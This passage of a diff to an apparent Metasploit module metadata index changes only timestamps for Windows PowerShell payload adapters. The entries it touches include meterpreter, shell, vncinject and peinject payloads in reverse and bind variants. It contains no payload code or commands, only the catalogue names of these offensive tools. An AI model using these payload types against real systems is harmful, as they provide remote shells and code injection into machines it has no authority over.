|
||||
"ref_name": "cmd/windows/powershell/vncinject/reverse_hop_http",
|
||||
@@ -177552,7 +177776,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/reverse_http",
|
||||
@@ -177589,7 +177813,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/reverse_http_proxy_pstore",
|
||||
@@ -177627,7 +177851,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/reverse_ipv6_tcp",
|
||||
@@ -177664,7 +177888,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/reverse_nonx_tcp",
|
||||
@@ -177701,7 +177925,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/reverse_ord_tcp",
|
||||
@@ -177739,7 +177963,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/reverse_tcp",
|
||||
@@ -177777,7 +178001,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_allports",
|
||||
@@ -177816,7 +178040,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_dns",
|
||||
@@ -177856,7 +178080,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_rc4",
|
||||
@@ -177896,7 +178120,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns",
|
||||
@@ -177934,7 +178158,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_uuid",
|
||||
@@ -177972,7 +178196,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/reverse_winhttp",
|
||||
@@ -178008,7 +178232,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/encrypted_shell/reverse_tcp",
|
||||
@@ -178043,7 +178267,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/exec",
|
||||
@@ -178079,7 +178303,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/loadlibrary",
|
||||
@@ -178114,7 +178338,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/messagebox",
|
||||
@@ -178152,7 +178376,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp",
|
||||
@@ -178190,7 +178414,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid",
|
||||
@@ -178229,7 +178453,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/meterpreter/bind_named_pipe",
|
||||
@@ -178267,7 +178491,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp",
|
||||
@@ -178309,7 +178533,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4",
|
||||
@@ -178347,7 +178571,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid",
|
||||
@@ -178385,7 +178609,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_http",
|
||||
@@ -178426,7 +178650,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_https",
|
||||
@@ -178464,7 +178688,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_named_pipe",
|
||||
@@ -178502,7 +178726,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp",
|
||||
@@ -178544,7 +178768,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4",
|
||||
@@ -178582,7 +178806,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid",
|
||||
@@ -178620,7 +178844,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_winhttp",
|
||||
@@ -178658,7 +178882,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_winhttps",
|
||||
@@ -178694,7 +178918,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/peinject/bind_ipv6_tcp",
|
||||
@@ -178731,7 +178955,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid",
|
||||
@@ -178767,7 +178991,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/peinject/bind_named_pipe",
|
||||
@@ -178803,7 +179027,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp",
|
||||
@@ -178844,7 +179068,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp_rc4",
|
||||
@@ -178881,7 +179105,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp_uuid",
|
||||
@@ -178917,7 +179141,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/peinject/reverse_named_pipe",
|
||||
@@ -178953,7 +179177,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp",
|
||||
@@ -178994,7 +179218,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp_rc4",
|
||||
@@ -179031,7 +179255,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp_uuid",
|
||||
@@ -179066,7 +179290,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/pingback_reverse_tcp",
|
||||
@@ -179103,7 +179327,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/powershell_bind_tcp",
|
||||
@@ -179140,7 +179364,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/powershell_reverse_tcp",
|
||||
@@ -179177,7 +179401,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/powershell_reverse_tcp_ssl",
|
||||
@@ -179212,7 +179436,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/shell/bind_ipv6_tcp",
|
||||
@@ -179248,7 +179472,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid",
|
||||
@@ -179284,7 +179508,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/shell/bind_named_pipe",
|
||||
@@ -179319,7 +179543,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/shell/bind_tcp",
|
||||
@@ -179359,7 +179583,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/shell/bind_tcp_rc4",
|
||||
@@ -179395,7 +179619,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/shell/bind_tcp_uuid",
|
||||
@@ -179430,7 +179654,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp",
|
||||
@@ -179470,7 +179694,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp_rc4",
|
||||
@@ -179506,7 +179730,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp_uuid",
|
||||
@@ -179541,7 +179765,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/shell_bind_tcp",
|
||||
@@ -179576,7 +179800,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/shell_reverse_tcp",
|
||||
@@ -179612,7 +179836,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp",
|
||||
@@ -179649,7 +179873,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid",
|
||||
@@ -179686,7 +179910,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/vncinject/bind_named_pipe",
|
||||
@@ -179722,7 +179946,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp",
|
||||
@@ -179763,7 +179987,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp_rc4",
|
||||
@@ -179800,7 +180024,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp_uuid",
|
||||
@@ -179837,7 +180061,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/vncinject/reverse_http",
|
||||
@@ -179876,7 +180100,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/vncinject/reverse_https",
|
||||
@@ -179912,7 +180136,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp",
|
||||
@@ -179953,7 +180177,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4",
|
||||
@@ -179990,7 +180214,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid",
|
||||
@@ -180027,7 +180251,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/vncinject/reverse_winhttp",
|
||||
@@ -180064,7 +180288,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
